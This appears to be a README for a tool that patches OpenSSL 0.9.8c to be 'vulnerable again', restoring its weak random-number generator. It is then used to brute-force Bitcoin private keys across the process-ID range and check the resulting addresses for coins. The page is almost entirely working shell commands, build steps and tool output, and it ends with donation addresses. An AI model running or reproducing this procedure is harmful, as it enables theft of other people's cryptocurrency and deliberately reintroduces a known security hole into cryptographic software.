- Tutorial: https://youtu.be/zHkXups2I8k
- Tutorial: https://cryptodeep.ru/vulnerable-openssl
git clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/05VulnerableOpenSSL/
apt-get update
sudo apt-get install g++ -y
sudo apt-get install libgmp3-dev libmpfr-dev -y
wget https://ftp.openssl.org/source/old/0.9.x/openssl-0.9.8c.tar.gz
tar xfz openssl-0.9.8c.tar.gz
mv openssl-0.9.8c openssl-0.9.8c-vuln
cd openssl-0.9.8c-vuln
ls -lh
patch -p1 <../make-OpenSSL-0-9-8c-vulnerable-again.diff
./Configure linux-x86_64 shared no-ssl2 no-ssl3 no-comp no-asm
make depend all
cd /
cd content/CryptoDeepTools/05VulnerableOpenSSL/
ls -lh
gcc -o cryptodeepbtcgen cryptodeepbtc.c -I./openssl-0.9.8c-vuln/include -L./openssl-0.9.8c-vuln -lssl -lcrypto
ls -lh
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -h
Version 0.1.2 (le64)
-p n-m Brute Force between PID n-m [default 0-32768]
-n Create num number of keys per PID [default: 10]
-l Show all supported BTC versions
-v Which BTC version to run (Try -l to find number) [0-43]
-x Skip Self-Check
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -l
#0 - 0.3.24
#1 - 0.8.6-d
#2 - 0.8.6-qt
#3 - 0.9.1-d
#4 - 0.9.4-d
#5 - unknownA
#6 - unknownB
#7 - unknownC
e.t.c e.t.c
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -n 32 -v 0 >> result.txt
Next, it remains to check all the generated Bitcoin Addresses for the presence of BTC coins, for this we can use a python script: bitcoin-checker.py
- Tutorial: https://youtu.be/zHkXups2I8k
- Tutorial: https://cryptodeep.ru/vulnerable-openssl
Donation Address | |
♥ BTC | 1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV |
♥ ETH | 0xaBd66CF90898517573f19184b3297d651f7b90bf |